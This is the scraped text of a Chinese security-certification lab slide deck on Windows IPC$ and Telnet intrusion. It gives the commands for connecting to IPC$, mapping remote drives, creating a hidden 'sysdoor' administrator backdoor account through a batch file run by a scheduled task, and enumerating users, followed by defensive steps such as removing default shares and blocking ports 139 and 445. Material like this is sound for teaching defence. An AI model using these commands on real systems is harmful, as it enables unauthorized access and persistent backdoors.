信息安全认证实验.ppt

《信息安全认证实验.ppt》由会员上传分享，免费在线阅读，更多相关内容在教育资源-天天文库。

1、信息安全认证培训实验实验二、IPC$和Telnet入侵试验教学目的与要求:掌握ipc$的概念，ipc$连接所使用的端口掌握ipc$链接的方法了解ipc$连接失败的常见原因掌握打开目标的IPC$共享以及其他共享的方法了解ipc$完整入侵步骤祥解掌握如何防范ipc$入侵仪器设备及用具:连网的个人计算机Windows2000系统平台实验二、IPC$和Telnet入侵试验实验准备：本机：开放IPC$共享已知远程主机的IP地址已知远程主机的管理员账号和密码（IPC$空连接除外）远程主机：开放IPC$共享启动server服务实验二、IPC$和

2、Telnet入侵试验1、建立IPC$连接在命令提示符下键入命令：NETuse\IPipc$”12345”/user:administrator2、映射网络驱动器把远程主机的C盘映射为本地磁盘Q盘netuseQ:\IPc$实验二、IPC$和Telnet入侵试验3、留后门（1）编写建立后门账号的批处理程序打开记事本编写批处理程序：netusersysdoor12345/addnetlocalgroupadministratorssysdoor/add（2）建立好后通过IPC$把他拷贝到目标主机：xcopy本地文件路径文件名

3、远程主机IP远程路径实验二、IPC$和Telnet入侵试验（3）查看远程主机时间（4）制定执行后门程序的计划任务At\IPtimecommond5、断开IPC$连接netuse\IPIPC$/del6、建立空连接netuse\IPipc$""/user:""7、查看远程主机共享（看不到默认共享）netview\IP8、得到远程主机的用户名列表nbtstat-AIP实验二、IPC$和Telnet入侵试验IPC$安全解决方案1、删除默认共享1）察看本地共享资源运行-cmd-输入netshare2）删除共享（重起后默认共

4、享仍然存在）netshareipc$/deletenetshareadmin$/deletenetsharec$/deletenetshared$/delete（如果有e,f,……可以继续删除）3）停止server服务实验二、IPC$和Telnet入侵试验2、屏蔽139，445端口1）139端口可以通过禁止NBT来屏蔽本地连接－TCP/IT属性－高级－WINS－选‘禁用TCP/IT上的NETBIOS’一项2）445端口可以通过修改注册表来屏蔽添加一个键值Hive:HKEY_LOCAL_MACHINEKey:SystemContr

5、olsetServicesNetBTParametersName:SMBDeviceEnabledType:REG_DWORDValue:0实验二、IPC$和Telnet入侵试验思考：如果不知道远程主机的用户名和口令，我们还能与远程主机进行连接并对远程主机进行控制吗？实验二、IPC$和Telnet入侵试验